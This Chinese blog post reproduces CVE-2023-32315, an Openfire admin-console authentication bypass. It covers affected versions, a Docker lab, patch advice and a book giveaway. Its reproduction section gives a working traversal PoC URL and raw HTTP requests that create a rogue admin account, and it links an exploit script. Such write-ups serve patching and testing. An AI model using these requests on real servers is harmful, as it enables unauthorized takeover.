正文

叮~你有新的速递!CVE-2023-32315漏洞(附EXP | 文末福利)

admin
admin V管理员 /0 评论 /564 阅读
0616
此篇文章发布距今已超过526天,您需要注意文章的内容或图片是否可用!

0x01 前言

Ignite Realtime Openfire是Ignite Realtime社区的一款采用Java开发且基于XMPP(前称Jabber,即时通讯协议)的跨平台开源实时协作(RTC)服务器。它能够构建高效率的即时通信服务器,并支持上万并发用户数量。Ignite Realtime Openfire 存在安全漏洞,该漏洞源于允许未经身份验证的用户在已配置的 Openfire 环境中使用未经身份验证的 Openfire 设置环境,以访问为管理用户保留的 Openfire 管理控制台中的受限页面

0x02 影响版本

Openfire以下产品和版本受到影响:3.10.0、3.10.1、3.10.2、3.10.34.0.0、4.0.1、4.0.2、4.0.3、4.0.44.1.0、4.1.1、4.1.2、4.1、3、4.1.4、4.1.5、4.1.64.2.0、4.2.1、4.2.2、4.2.3、4.2.44.3.0、4.3.1、4.3.24.4.0、4.4.1、4.4.2、4.4.3、4.4.44.5.0、4.5.1、4.5.2、4.5.3、4.5.4、4.5.5、4.5.64.6.0、4.6.1、4.6.2、4.6.3、4.6.4、4.6.5、4.6.6、4.6.74.7.0、4.7.1、4.7.2、4.7.3、4.7.4

0x03 环境搭建

利用docker搭建漏洞环境
 docker pull nasqueron/openfire:4.7.4

启动docker
docker run --name openfire -d --restart=always   --publish 9090:9090 --publish 5222:5222 --publish 7777:7777   --volume /srv/docker/openfire:/var/lib/openfire   nasqueron/openfire:4.7.4

环境搭建成功访问如下,一路默认即可

0x04 漏洞复现

登录页面是这个酱紫

访问该PoC、这个酱紫说明漏洞存在

http://1.1.1.1:9090/setup/setup-s/%u002e%u002e/%u002e%u002e/log.jsp

获取JSESSIONID和csrftoken

GET /setup/setup-s/%u002e%u002e/%u002e%u002e/user-groups.jsp HTTP/1.1Host: 1.1.1.1:9090User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/113.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateDNT: 1Connection: closeUpgrade-Insecure-Requests: 1

构造数据包添加用户

GET /setup/setup-s/%u002e%u002e/%u002e%u002e/user-create.jsp?csrf=voTNOyC2YZU7SPg&username=test123&name=&email=&password=test123&passwordConfirm=test123&isadmin=on&create=%E5%88%9B%E5%BB%BA%E7%94%A8%E6%88%B7 HTTP/1.1Host: xxxxxxx:9090Cookie: JSESSIONID=node01ab93fdkjh6pbi62mo55f9m1a5.node0; csrf=voTNOyC2YZU7SPgConnection: close

插件上传

命令执行

GitHub大佬写好的脚本验证(很好用师傅们多给大佬点个☆):

https://github.com/tangxiaofeng7/CVE-2023-32315-Openfire-Bypass

0x05 修复方案

目前厂商已发布升级补丁以修复漏洞,补丁获取链接:

升级至安全版本4.6.8 或 4.7.5及以上

限制网络访问,切勿将 Openfire 管理控制台暴露于互联网,使用网络安全措施,确保只有受信任成员才能访问。

https://github.com/igniterealtime/Openfire/security/advisories/GHSA-gw42-f939-fhvm



抽奖送书


冲冲冲!

没啥要求,给兄弟们一个小福利,

中奖了记得联系我验证就OK!

超过24小时未联系的视为自动放弃哈~

点击下方名片回复【抽奖】即可获取


内容简介

我们都生活在移动互联网时代,个人信息、企业信息等都暴露在互联网之下。一旦有居心叵测的人攻破网络,会造成无法估量的损失。本书结合红日安全团队的多年经验,深入讲解Web安全的相关知识。

全书共21章,第1章到第6章讲解入门知识,包括HTTP基本概念、工具实战、信息收集、靶场搭建等内容;第7章到第20章讲解Web渗透测试的14个典型漏洞案例,包括SQL注入、XSS漏洞、CSRF漏洞、SSRF漏洞、任意文件上传、业务逻辑漏洞等内容;第21章是项目实战,主要模拟真实Web安全评估项目。

购买链接地址:

http://product.dangdang.com/29460729.html



往期推荐

【漏洞系列】

【漏洞系列】

【漏洞系列】

叮~你有新的速递!CVE-2023-29922漏洞(附脚本)

【漏洞系列】

【漏洞系列】

【免杀系列】

【免杀系列】

【免杀系列】

【免杀系列】

【移动安全】

【移动安全】


觉得内容不错,就点下在看
如侵权请私聊公众号删文


叮~你有新的速递!CVE-2023-32315漏洞(附EXP | 文末福利)


推荐站内搜索:最好用的开发软件、免费开源系统、渗透测试工具云盘下载、最新渗透测试资料、最新黑客工具下载……
宙飒zhousa.om